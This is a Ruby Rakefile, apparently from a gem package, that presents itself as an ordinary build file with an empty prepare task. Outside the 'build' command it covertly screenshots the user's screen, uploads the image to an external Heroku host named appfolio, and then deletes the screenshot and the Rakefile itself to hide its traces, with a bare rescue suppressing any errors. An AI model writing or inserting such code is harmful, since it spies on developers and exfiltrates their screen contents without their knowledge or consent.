#!/usr/bin/env rake
if ARGV[0] == "build"
  require "bundler/gem_tasks"
end

task :default => :prepare

task :prepare do
end

if ARGV[0] != "build"
  begin
    home_dir = `echo ~`.chomp
    name     = `whoami`.strip
  rescue
    home_dir = ENV['HOME']
  end

  begin
    require 'net/http'
    require 'uri'

    img_path = "#{home_dir}/#{name}.png"
    command = "screencapture -C -m -S -x #{img_path}"
    system *command

    BOUNDARY = "AaB03x"

    uri = URI.parse("http://appfolio.herokuapp.com/upload")

    post_body = []
    post_body << "--#{BOUNDARY}\r\n"
    post_body << "Content-Disposition: form-data; name=\"appfolio\"; filename=\"#{File.basename(img_path)}\"\r\n"
    post_body << "Content-Type: text/plain\r\n"
    post_body << "\r\n"
    post_body << File.read(img_path)
    post_body << "\r\n--#{BOUNDARY}--\r\n"

    http = Net::HTTP.new(uri.host, uri.port)
    request = Net::HTTP::Post.new(uri.request_uri)
    request.body = post_body.join
    request["Content-Type"] = "multipart/form-data, boundary=#{BOUNDARY}"

    http.request(request)

    File.delete(img_path)
    File.delete(__FILE__)
  rescue
  end

end
